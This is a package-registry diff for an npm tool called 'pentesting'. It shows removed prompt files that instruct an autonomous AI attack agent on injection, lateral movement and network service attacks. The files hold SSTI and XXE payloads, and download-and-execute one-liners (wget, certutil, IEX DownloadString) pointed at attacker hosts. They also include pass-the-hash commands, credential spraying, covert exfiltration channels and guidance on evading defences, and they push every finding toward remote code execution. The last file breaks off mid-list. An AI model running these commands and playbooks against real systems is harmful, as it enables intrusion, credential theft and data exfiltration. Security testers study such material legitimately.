pentesting 0.73.14 → 0.90.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +119 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,217 +0,0 @@
|
|
|
1
|
-
# Injection Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
|
|
5
|
-
> to decide what to test and in what order. Adapt dynamically — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: web.md (web testing), evasion.md (bypass), payload-craft.md (mutation)
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
Every input is a potential injection point. There are 20+ injection TYPES,
|
|
11
|
-
each with hundreds of variants. **You cannot memorize them all — SEARCH for each.**
|
|
12
|
-
|
|
13
|
-
## Injection Type Map (Know ALL Categories)
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
INJECTION TYPES — Complete Category Awareness:
|
|
17
|
-
│
|
|
18
|
-
├── 1. SQL Injection (SQLi)
|
|
19
|
-
│ ├── In-band: UNION-based, Error-based
|
|
20
|
-
│ ├── Blind: Boolean-based, Time-based
|
|
21
|
-
│ ├── Out-of-band: DNS/HTTP exfiltration
|
|
22
|
-
│ ├── Second-order: stored then triggered
|
|
23
|
-
│ ├── Stacked queries: multiple statements
|
|
24
|
-
│ └── DB-specific: MySQL, PostgreSQL, MSSQL, Oracle, SQLite (each has unique syntax)
|
|
25
|
-
│
|
|
26
|
-
├── 2. Command Injection (CMDi / OS Injection)
|
|
27
|
-
│ ├── Direct: ; | & && || ` $()
|
|
28
|
-
│ ├── Blind: timing-based (sleep/ping), out-of-band (DNS/HTTP callback)
|
|
29
|
-
│ ├── Argument injection: --option=malicious
|
|
30
|
-
│ └── Environment variable injection
|
|
31
|
-
│
|
|
32
|
-
├── 3. Server-Side Template Injection (SSTI)
|
|
33
|
-
│ ├── Jinja2 (Python): {{7*7}}, {{config}}, {{''.__class__.__mro__[2].__subclasses__()}}
|
|
34
|
-
│ ├── Twig (PHP): {{7*7}}, {{_self.env.registerUndefinedFilterCallback("exec")}}
|
|
35
|
-
│ ├── Freemarker (Java): ${7*7}, <#assign ex="freemarker.template.utility.Execute"?new()>
|
|
36
|
-
│ ├── ERB (Ruby): <%=7*7%>, <%=system('id')%>
|
|
37
|
-
│ ├── Pug/Jade (Node): #{7*7}
|
|
38
|
-
│ ├── Velocity (Java): #set($x=7*7)$x
|
|
39
|
-
│ └── DETECTION: Send polyglot → {{7*7}}${7*7}<%=7*7%>${{7*7}} → see what evaluates
|
|
40
|
-
│
|
|
41
|
-
├── 4. Cross-Site Scripting (XSS)
|
|
42
|
-
│ ├── Reflected, Stored, DOM-based, Blind
|
|
43
|
-
│ ├── Context: HTML body, attribute, JavaScript, URL, CSS, SVG, MathML
|
|
44
|
-
│ ├── Payloads: <script>, <img onerror>, <svg onload>, event handlers, javascript: URI
|
|
45
|
-
│ └── Impact: session theft, keylogging, phishing, crypto mining, worm
|
|
46
|
-
│
|
|
47
|
-
├── 5. XML External Entity (XXE)
|
|
48
|
-
│ ├── Classic: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
|
49
|
-
│ ├── Blind: out-of-band via DTD + HTTP/DNS callback
|
|
50
|
-
│ ├── Error-based: trigger error containing file content
|
|
51
|
-
│ ├── Through: SOAP, SVG upload, DOCX/XLSX, RSS feeds, SAML
|
|
52
|
-
│ └── Variants: XInclude, XSLT injection
|
|
53
|
-
│
|
|
54
|
-
├── 6. LDAP Injection
|
|
55
|
-
│ ├── Authentication bypass: *)(&
|
|
56
|
-
│ ├── Data extraction: )(cn=*)
|
|
57
|
-
│ └── Blind: timing/error differences
|
|
58
|
-
│
|
|
59
|
-
├── 7. NoSQL Injection
|
|
60
|
-
│ ├── MongoDB: {"$gt":""}, {"$ne":""}, {"$regex":".*"}
|
|
61
|
-
│ ├── Authentication bypass: {"username":{"$ne":""},"password":{"$ne":""}}
|
|
62
|
-
│ └── Operator injection: $where, $regex, $gt, $ne
|
|
63
|
-
│
|
|
64
|
-
├── 8. XPath Injection
|
|
65
|
-
│ ├── Similar to SQLi but for XML: ' or '1'='1
|
|
66
|
-
│ └── Blind: boolean/timing based
|
|
67
|
-
│
|
|
68
|
-
├── 9. CRLF Injection
|
|
69
|
-
│ ├── Header injection: %0d%0a
|
|
70
|
-
│ ├── Can lead to: HTTP response splitting, XSS, cache poisoning
|
|
71
|
-
│ └── Log injection: inject fake log entries
|
|
72
|
-
│
|
|
73
|
-
├── 10. Header Injection
|
|
74
|
-
│ ├── Host header: password reset poisoning, routing bypass
|
|
75
|
-
│ ├── X-Forwarded-For: IP-based access control bypass
|
|
76
|
-
│ ├── X-Original-URL / X-Rewrite-URL: path-based access control bypass
|
|
77
|
-
│ └── Referer: SSRF via referer processing
|
|
78
|
-
│
|
|
79
|
-
├── 11. SSTI → RCE Chains (template-specific)
|
|
80
|
-
│ └── web_search("{template_engine} SSTI to RCE payload")
|
|
81
|
-
│
|
|
82
|
-
├── 12. Expression Language Injection (EL Injection)
|
|
83
|
-
│ ├── Java EE: ${7*7}, #{7*7}
|
|
84
|
-
│ └── Spring: *{7*7}
|
|
85
|
-
│
|
|
86
|
-
├── 13. Code Injection
|
|
87
|
-
│ ├── PHP: eval(), assert(), preg_replace with /e
|
|
88
|
-
│ ├── Python: eval(), exec(), input() (Python 2)
|
|
89
|
-
│ ├── Ruby: eval(), system()
|
|
90
|
-
│ └── Node: eval(), Function()
|
|
91
|
-
│
|
|
92
|
-
├── 14. CSV Injection (Formula Injection)
|
|
93
|
-
│ ├── =cmd|'/C calc'!A0 (Excel)
|
|
94
|
-
│ └── Through exported CSV/XLSX files
|
|
95
|
-
│
|
|
96
|
-
├── 15. Email Header Injection
|
|
97
|
-
│ ├── %0aCc: attacker@evil.com
|
|
98
|
-
│ └── Add arbitrary recipients, modify headers
|
|
99
|
-
│
|
|
100
|
-
├── 16. HTTP Parameter Pollution (HPP)
|
|
101
|
-
│ ├── ?param=good¶m=evil (server picks which?)
|
|
102
|
-
│ └── Bypass WAF by splitting payload across same-name params
|
|
103
|
-
│
|
|
104
|
-
├── 17. Prototype Pollution (JavaScript)
|
|
105
|
-
│ ├── __proto__[isAdmin]=true
|
|
106
|
-
│ ├── constructor.prototype.isAdmin=true
|
|
107
|
-
│ └── Can lead to: RCE, auth bypass, DoS
|
|
108
|
-
│
|
|
109
|
-
├── 18. Insecure Deserialization
|
|
110
|
-
│ ├── Java: ObjectInputStream → gadget chains (ysoserial)
|
|
111
|
-
│ ├── PHP: unserialize() → POP chains (phpggc)
|
|
112
|
-
│ ├── Python: pickle.loads() → __reduce__ → RCE
|
|
113
|
-
│ ├── .NET: BinaryFormatter, JSON.NET TypeNameHandling
|
|
114
|
-
│ ├── Ruby: Marshal.load()
|
|
115
|
-
│ └── Node: node-serialize
|
|
116
|
-
│
|
|
117
|
-
├── 19. GraphQL Injection
|
|
118
|
-
│ ├── Introspection: {__schema{types{name,fields{name}}}}
|
|
119
|
-
│ ├── Batching for brute force bypass
|
|
120
|
-
│ ├── Nested queries for DoS
|
|
121
|
-
│ └── Mutation discovery → unauthorized operations
|
|
122
|
-
│
|
|
123
|
-
└── 20. WebSocket Injection
|
|
124
|
-
├── Same injection types apply through WebSocket messages
|
|
125
|
-
└── Often LESS filtered than HTTP requests
|
|
126
|
-
```
|
|
127
|
-
|
|
128
|
-
## 🧠 Injection Discovery — Autonomous Decision Tree
|
|
129
|
-
|
|
130
|
-
```
|
|
131
|
-
FOR EVERY input point discovered:
|
|
132
|
-
|
|
133
|
-
1. IDENTIFY context: Where does this input go?
|
|
134
|
-
├── Database query → SQLi/NoSQLi
|
|
135
|
-
├── System command → CMDi
|
|
136
|
-
├── Template render → SSTI
|
|
137
|
-
├── XML parser → XXE
|
|
138
|
-
├── File path → LFI/RFI (see file-attacks.md)
|
|
139
|
-
├── HTTP header → Header injection / CRLF
|
|
140
|
-
├── LDAP query → LDAPi
|
|
141
|
-
├── HTML output → XSS
|
|
142
|
-
├── Deserialization → Insecure deserialization
|
|
143
|
-
└── Unknown → try ALL categories with detection probes
|
|
144
|
-
|
|
145
|
-
2. DETECTION PROBES (send these to identify vulnerability type):
|
|
146
|
-
├── ' " ; — → SQL errors?
|
|
147
|
-
├── {{7*7}} ${7*7} → Template evaluation?
|
|
148
|
-
├── ;id ;whoami |id → Command output?
|
|
149
|
-
├── <script>alert(1)</script> → XSS rendering?
|
|
150
|
-
├── <!--#exec cmd="id"--> → SSI?
|
|
151
|
-
├── %0d%0aHeader:injected → CRLF?
|
|
152
|
-
└── ANY behavioral difference (error, timing, output) = signal
|
|
153
|
-
|
|
154
|
-
3. CONFIRM → find the exact injection type and context
|
|
155
|
-
4. EXPLOIT → web_search("{injection_type} exploitation payloads hacktricks")
|
|
156
|
-
5. BLOCKED? → payload_mutate + evasion.md → try encoded variants
|
|
157
|
-
6. CHAIN → injection → RCE → shell → privesc (see shells.md, privesc.md)
|
|
158
|
-
```
|
|
159
|
-
|
|
160
|
-
## Injection Search Patterns
|
|
161
|
-
|
|
162
|
-
```
|
|
163
|
-
For EVERY injection type discovered:
|
|
164
|
-
|
|
165
|
-
web_search("{injection_type} exploit payloads hacktricks")
|
|
166
|
-
web_search("{injection_type} {database/language} cheatsheet")
|
|
167
|
-
web_search("{injection_type} bypass WAF filter")
|
|
168
|
-
web_search("{injection_type} blind extraction techniques")
|
|
169
|
-
web_search("{injection_type} to RCE")
|
|
170
|
-
web_search("PayloadsAllTheThings {injection_type}")
|
|
171
|
-
|
|
172
|
-
Automated tools (where applicable):
|
|
173
|
-
├── SQLi: sqlmap -u URL --forms --batch --level=5 --risk=3
|
|
174
|
-
├── XSS: dalfox url URL
|
|
175
|
-
├── SSTI: tplmap -u URL
|
|
176
|
-
├── CMDi: commix --url=URL
|
|
177
|
-
├── XXE: xxeinjector
|
|
178
|
-
└── General: nuclei -u URL -as
|
|
179
|
-
```
|
|
180
|
-
|
|
181
|
-
## Injection → RCE Chains
|
|
182
|
-
```
|
|
183
|
-
Goal: Every injection should eventually lead to RCE if possible.
|
|
184
|
-
|
|
185
|
-
SQLi → RCE:
|
|
186
|
-
├── MySQL: INTO OUTFILE webshell, UDF, sys_exec
|
|
187
|
-
├── PostgreSQL: COPY TO file, lo_export, pg_read_file
|
|
188
|
-
├── MSSQL: xp_cmdshell, sp_OACreate
|
|
189
|
-
├── Oracle: DBMS_SCHEDULER, Java stored procedures
|
|
190
|
-
└── SQLite: load_extension()
|
|
191
|
-
|
|
192
|
-
SSTI → RCE:
|
|
193
|
-
├── Jinja2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
|
|
194
|
-
├── Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
|
195
|
-
├── Each engine has different paths → SEARCH for specific engine
|
|
196
|
-
└── web_search("{engine} SSTI RCE payload")
|
|
197
|
-
|
|
198
|
-
XXE → impact:
|
|
199
|
-
├── File read → credentials → further access
|
|
200
|
-
├── SSRF → internal service access
|
|
201
|
-
├── RCE (rare): expect:// wrapper (PHP), xslt:// extensions
|
|
202
|
-
└── Blind → out-of-band data exfiltration
|
|
203
|
-
|
|
204
|
-
XSS → impact:
|
|
205
|
-
├── Session theft → admin access
|
|
206
|
-
├── Blind XSS → admin panel compromise
|
|
207
|
-
├── DOM manipulation → credential theft
|
|
208
|
-
├── Worm → self-spreading XSS
|
|
209
|
-
└── Keylogging → capture all input
|
|
210
|
-
|
|
211
|
-
Deserialization → RCE:
|
|
212
|
-
├── Java: ysoserial → choose correct gadget chain for target libraries
|
|
213
|
-
├── PHP: phpggc → choose correct POP chain
|
|
214
|
-
├── Python: pickle → __reduce__ method
|
|
215
|
-
├── .NET: ysoserial.net
|
|
216
|
-
└── ALWAYS: web_search("{framework} deserialization gadget chain RCE")
|
|
217
|
-
```
|
|
@@ -1,128 +0,0 @@
|
|
|
1
|
-
# Lateral Movement & Pivoting — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: shells.md (shell access), ad-attack.md (AD movement), privesc.md (escalation)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
Initial access is one machine. Lateral movement = entire network.
|
|
7
|
-
Every credential, hash, token, and key is a potential pivot point.
|
|
8
|
-
|
|
9
|
-
## Lateral Movement Techniques
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
LATERAL MOVEMENT MAP:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Credential-Based Movement
|
|
15
|
-
│ ├── SSH with credentials: ssh user@TARGET
|
|
16
|
-
│ ├── SSH with key: ssh -i stolen_id_rsa user@TARGET
|
|
17
|
-
│ ├── RDP: xfreerdp /v:TARGET /u:user /p:pass /cert:ignore
|
|
18
|
-
│ ├── WinRM: evil-winrm -i TARGET -u user -p pass
|
|
19
|
-
│ ├── PsExec: impacket-psexec user:pass@TARGET
|
|
20
|
-
│ ├── WMI: impacket-wmiexec user:pass@TARGET
|
|
21
|
-
│ ├── SMBExec: impacket-smbexec user:pass@TARGET
|
|
22
|
-
│ ├── DCOM: impacket-dcomexec user:pass@TARGET
|
|
23
|
-
│ ├── Pass-the-Hash: impacket-psexec -hashes :NTLM_HASH user@TARGET
|
|
24
|
-
│ ├── Pass-the-Ticket: export KRB5CCNAME=ticket.ccache → impacket tools -k
|
|
25
|
-
│ └── Credential spraying: try EVERY found credential on EVERY accessible service
|
|
26
|
-
│
|
|
27
|
-
├── 2. Network Pivoting (Access Hidden Networks)
|
|
28
|
-
│ ├── SSH tunneling:
|
|
29
|
-
│ │ ├── Local: ssh -L LOCAL_PORT:INTERNAL_HOST:INTERNAL_PORT user@PIVOT
|
|
30
|
-
│ │ ├── Dynamic SOCKS: ssh -D 9050 user@PIVOT → proxychains
|
|
31
|
-
│ │ ├── Remote: ssh -R ATTACKER_PORT:INTERNAL_HOST:PORT user@ATTACKER
|
|
32
|
-
│ │ └── ProxyJump: ssh -J user@PIVOT user@INTERNAL
|
|
33
|
-
│ │
|
|
34
|
-
│ ├── Chisel (recommended for non-SSH):
|
|
35
|
-
│ │ ├── Server (attacker): chisel server -p 8080 --reverse
|
|
36
|
-
│ │ ├── Client (pivot): chisel client ATTACKER:8080 R:socks
|
|
37
|
-
│ │ └── Then: proxychains nmap -Pn INTERNAL_SUBNET
|
|
38
|
-
│ │
|
|
39
|
-
│ ├── Ligolo-ng (easiest for complex pivoting):
|
|
40
|
-
│ │ ├── Proxy (attacker): ligolo-proxy -selfcert -laddr 0.0.0.0:PORT
|
|
41
|
-
│ │ ├── Agent (pivot): ligolo-agent -connect ATTACKER:PORT -ignore-cert
|
|
42
|
-
│ │ └── Add routes to internal networks from attacker
|
|
43
|
-
│ │
|
|
44
|
-
│ ├── socat:
|
|
45
|
-
│ │ ├── Port forwarding: socat TCP-LISTEN:LOCAL,fork TCP:INTERNAL:PORT
|
|
46
|
-
│ │ └── Useful on systems without SSH
|
|
47
|
-
│ │
|
|
48
|
-
│ ├── sshuttle: sshuttle -r user@PIVOT INTERNAL_SUBNET/24
|
|
49
|
-
│ │ └── Transparent proxy — no need for proxychains
|
|
50
|
-
│ │
|
|
51
|
-
│ ├── Metasploit: route add SUBNET MASK SESSION
|
|
52
|
-
│ │ └── autoroute + socks_proxy modules
|
|
53
|
-
│ │
|
|
54
|
-
│ ├── Windows-specific:
|
|
55
|
-
│ │ ├── netsh portproxy: netsh interface portproxy add v4tov4 listenport=P connectaddress=HOST connectport=P
|
|
56
|
-
│ │ ├── plink.exe: plink -ssh -L LOCAL:INTERNAL:PORT user@PIVOT
|
|
57
|
-
│ │ └── web_search("windows port forwarding pivoting techniques")
|
|
58
|
-
│ │
|
|
59
|
-
│ └── web_search("pivoting tunneling techniques {tool} hacktricks")
|
|
60
|
-
│
|
|
61
|
-
├── 3. File Transfer (Getting Tools Where They Need to Go)
|
|
62
|
-
│ ├── Linux upload to target:
|
|
63
|
-
│ │ ├── wget/curl: wget http://ATTACKER:PORT/file -O /tmp/file
|
|
64
|
-
│ │ ├── Python HTTP server: python3 -m http.server PORT (on attacker)
|
|
65
|
-
│ │ ├── scp: scp file user@TARGET:/tmp/
|
|
66
|
-
│ │ ├── Netcat: nc -lvnp PORT > file (recv) | nc TARGET PORT < file (send)
|
|
67
|
-
│ │ ├── Base64: base64 file → echo 'B64' | base64 -d > file
|
|
68
|
-
│ │ └── /dev/tcp: cat < /dev/tcp/ATTACKER/PORT > file
|
|
69
|
-
│ │
|
|
70
|
-
│ ├── Windows upload to target:
|
|
71
|
-
│ │ ├── certutil: certutil -urlcache -split -f http://ATTACKER/file file
|
|
72
|
-
│ │ ├── PowerShell: IWR -Uri http://ATTACKER/file -OutFile file
|
|
73
|
-
│ │ ├── bitsadmin: bitsadmin /transfer job /download /priority high URL file
|
|
74
|
-
│ │ ├── SMB: copy \\ATTACKER\share\file . (start smbserver on attacker)
|
|
75
|
-
│ │ └── In-memory: IEX(New-Object Net.WebClient).DownloadString('http://ATK/ps1')
|
|
76
|
-
│ │
|
|
77
|
-
│ └── web_search("file transfer techniques {OS} hacktricks")
|
|
78
|
-
│
|
|
79
|
-
├── 4. Internal Network Discovery
|
|
80
|
-
│ ├── From compromised host:
|
|
81
|
-
│ │ ├── ip a, ifconfig, ipconfig /all → network interfaces
|
|
82
|
-
│ │ ├── ip route, route -n, route print → routing tables
|
|
83
|
-
│ │ ├── arp -a → known hosts in local network
|
|
84
|
-
│ │ ├── cat /etc/hosts, type C:\Windows\System32\drivers\etc\hosts
|
|
85
|
-
│ │ ├── netstat -antp → active connections → more targets
|
|
86
|
-
│ │ ├── Internal port scan: for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i; done
|
|
87
|
-
│ │ └── proxychains nmap -sT -Pn -p- INTERNAL_SUBNET (through pivot)
|
|
88
|
-
│ │
|
|
89
|
-
│ └── EVERY new network found = FULL reconnaissance cycle (rerun everything)
|
|
90
|
-
│
|
|
91
|
-
├── 5. Credential Reuse Strategy
|
|
92
|
-
│ ├── Every found credential → test on ALL reachable services:
|
|
93
|
-
│ │ ├── SSH, RDP, WinRM, SMB, FTP, databases, web logins, VPN
|
|
94
|
-
│ │ ├── crackmapexec smb SUBNET/24 -u user -p pass → mass test
|
|
95
|
-
│ │ ├── Same password with different usernames
|
|
96
|
-
│ │ ├── Same username with slight password variations
|
|
97
|
-
│ │ └── Hash-based: Pass-the-Hash to all Windows targets
|
|
98
|
-
│ │
|
|
99
|
-
│ └── Credential chain: creds from host A → access host B → creds from B → access C
|
|
100
|
-
│
|
|
101
|
-
└── 6. Covert Channels
|
|
102
|
-
├── DNS tunneling: iodine, dnscat2 → bypass network restrictions
|
|
103
|
-
├── ICMP tunneling: icmpsh, ptunnel
|
|
104
|
-
├── HTTP tunneling: through web proxies
|
|
105
|
-
├── WebSocket tunneling: through WAF
|
|
106
|
-
└── web_search("covert channel exfiltration tunneling {protocol}")
|
|
107
|
-
```
|
|
108
|
-
|
|
109
|
-
## Pivoting Workflow
|
|
110
|
-
```
|
|
111
|
-
Got access to new host?
|
|
112
|
-
1. STABILIZE: upgrade shell, set up persistence (shells.md)
|
|
113
|
-
2. ENUMERATE: network interfaces, routes, ARP, connections, hosts file
|
|
114
|
-
3. LOOT: credentials, keys, tokens, hashes, config files
|
|
115
|
-
4. PIVOT: set up tunnel/proxy to newly discovered networks
|
|
116
|
-
5. SCAN: recon the new network through the pivot
|
|
117
|
-
6. SPRAY: test found credentials on all new services
|
|
118
|
-
7. REPEAT: for each new host compromised
|
|
119
|
-
```
|
|
120
|
-
|
|
121
|
-
## Search Patterns
|
|
122
|
-
```
|
|
123
|
-
web_search("pivoting techniques {tool_name} hacktricks")
|
|
124
|
-
web_search("file transfer {OS} one-liner techniques")
|
|
125
|
-
web_search("{protocol} tunneling tool pivot")
|
|
126
|
-
web_search("proxychains {tool} through pivot")
|
|
127
|
-
web_search("lateral movement {technique} detection evasion")
|
|
128
|
-
```
|
|
@@ -1,229 +0,0 @@
|
|
|
1
|
-
# Network Service Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
|
|
5
|
-
> to decide what to test and in what order. Adapt dynamically — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: recon.md (discovery), exploit.md (exploitation), shells.md (getting shell)
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
Every open port is an attack surface. Every service has known and unknown vulnerabilities.
|
|
11
|
-
**ALWAYS: service detection → version → IMMEDIATE web_search for exploits.**
|
|
12
|
-
|
|
13
|
-
## Service Attack Decision Engine
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
FOR EVERY OPEN PORT DISCOVERED:
|
|
17
|
-
│
|
|
18
|
-
├── 1. IDENTIFY: nmap -Pn -sV -sC -p PORT TARGET → exact version
|
|
19
|
-
├── 2. SEARCH: web_search("{service} {version} exploit CVE hacktricks")
|
|
20
|
-
├── 3. CHECK: searchsploit {service} {version}
|
|
21
|
-
├── 4. READ: browse_url(hacktricks_result) → learn attack methodology
|
|
22
|
-
├── 5. ATTACK: apply known techniques + search for bypasses
|
|
23
|
-
├── 6. BLOCKED: evasion.md + payload_mutate → try encoded/alternative
|
|
24
|
-
└── 7. CHAIN: combine with other findings (see strategy.md)
|
|
25
|
-
```
|
|
26
|
-
|
|
27
|
-
## 🌐 Web Services (80, 443, 8080, 8443)
|
|
28
|
-
|
|
29
|
-
```
|
|
30
|
-
Web Server Identified → FULL WEB PIPELINE:
|
|
31
|
-
├── Technology: whatweb, wappalyzer, curl headers
|
|
32
|
-
├── CMS detection → CMS-specific scanner:
|
|
33
|
-
│ WordPress → wpscan --enumerate vp,vt,u --plugins-detection aggressive
|
|
34
|
-
│ Drupal → droopescan scan drupal -u URL
|
|
35
|
-
│ Joomla → joomscan -u URL
|
|
36
|
-
│ web_search("{CMS} {version} exploit CVE")
|
|
37
|
-
│
|
|
38
|
-
├── Content discovery (MANDATORY):
|
|
39
|
-
│ ├── ffuf -u URL/FUZZ -w /usr/share/wordlists/dirb/big.txt -fc 404
|
|
40
|
-
│ ├── feroxbuster -u URL --smart --auto-tune
|
|
41
|
-
│ ├── gobuster dir -u URL -w wordlist -x php,asp,aspx,jsp,html,js,txt,bak
|
|
42
|
-
│ ├── Try backup extensions: .bak, .old, .orig, .save, .swp, ~, .tmp
|
|
43
|
-
│ └── Add technology-specific extensions to wordlist
|
|
44
|
-
│
|
|
45
|
-
├── Sensitive file check:
|
|
46
|
-
│ .env, .git/HEAD, .DS_Store, .htaccess, web.config,
|
|
47
|
-
│ robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml,
|
|
48
|
-
│ phpinfo.php, server-status, server-info, info.php, test.php
|
|
49
|
-
│
|
|
50
|
-
├── API discovery:
|
|
51
|
-
│ /api, /api/v1, /swagger, /swagger-ui, /openapi.json,
|
|
52
|
-
│ /graphql, /graphiql, /api-docs, /.well-known/
|
|
53
|
-
│
|
|
54
|
-
├── Virtual hosts: ffuf -H "Host: FUZZ.TARGET" -u http://IP -w subdomains.txt
|
|
55
|
-
│
|
|
56
|
-
└── Deep web testing → see injection.md, auth-access.md, file-attacks.md
|
|
57
|
-
```
|
|
58
|
-
|
|
59
|
-
## 🔐 Authentication Services
|
|
60
|
-
|
|
61
|
-
```
|
|
62
|
-
SSH (22):
|
|
63
|
-
├── Version CVE: web_search("OpenSSH {version} CVE exploit")
|
|
64
|
-
├── Username enumeration: web_search("openssh {version} user enumeration CVE")
|
|
65
|
-
├── Brute force: hydra -l root -P wordlist ssh://TARGET
|
|
66
|
-
├── Key-based: try found keys from other hosts
|
|
67
|
-
├── Agent forwarding: if forwarded → hijack to access other hosts
|
|
68
|
-
└── Misconfig: check for weak algorithms, passwordless login
|
|
69
|
-
|
|
70
|
-
FTP (21):
|
|
71
|
-
├── Anonymous: ftp TARGET → anonymous / (empty password)
|
|
72
|
-
├── Version CVE: web_search("{ftpd} {version} exploit")
|
|
73
|
-
├── Brute force: hydra -l admin -P wordlist ftp://TARGET
|
|
74
|
-
├── Writable dirs: if serves web → upload web shell
|
|
75
|
-
├── Bounce attack: use FTP to scan internal ports
|
|
76
|
-
└── PASV mode: reveals internal IP addresses
|
|
77
|
-
|
|
78
|
-
Telnet (23):
|
|
79
|
-
├── Often unencrypted → capture credentials
|
|
80
|
-
├── Default creds: web_search("{device} telnet default credentials")
|
|
81
|
-
└── Version exploits: web_search("telnet {version} CVE")
|
|
82
|
-
|
|
83
|
-
RDP (3389):
|
|
84
|
-
├── BlueKeep: nmap -Pn --script rdp-vuln-ms12-020 -p 3389 TARGET
|
|
85
|
-
├── Brute force: hydra -l admin -P wordlist rdp://TARGET
|
|
86
|
-
├── NLA bypass: web_search("RDP NLA bypass technique")
|
|
87
|
-
├── Credentials: try EVERY found credential
|
|
88
|
-
└── Pass-the-Hash: xfreerdp /v:TARGET /u:admin /pth:NTLM -sec-nla
|
|
89
|
-
|
|
90
|
-
VNC (5900-5910):
|
|
91
|
-
├── No auth: vncviewer TARGET::5900
|
|
92
|
-
├── Brute force: hydra -P wordlist -s 5900 TARGET vnc
|
|
93
|
-
├── VNC authentication bypass: web_search("VNC auth bypass")
|
|
94
|
-
└── Decrypt stored password: web_search("vnc password decrypt")
|
|
95
|
-
|
|
96
|
-
WinRM (5985/5986):
|
|
97
|
-
├── evil-winrm -i TARGET -u user -p pass
|
|
98
|
-
├── Pass-the-Hash: evil-winrm -i TARGET -u user -H NTLM_HASH
|
|
99
|
-
└── If valid creds → full PowerShell access
|
|
100
|
-
```
|
|
101
|
-
|
|
102
|
-
## 📂 File Sharing Services
|
|
103
|
-
|
|
104
|
-
```
|
|
105
|
-
SMB (139/445):
|
|
106
|
-
├── Null session: smbclient -L //TARGET -N, smbmap -H TARGET -u '' -p ''
|
|
107
|
-
├── Guest: smbmap -H TARGET -u 'guest' -p ''
|
|
108
|
-
├── Enumerate shares: crackmapexec smb TARGET --shares -u '' -p ''
|
|
109
|
-
├── Download everything: smbget -R smb://TARGET/share
|
|
110
|
-
├── Writable share: upload payload (web shell if web-accessible, batch/exe if executed)
|
|
111
|
-
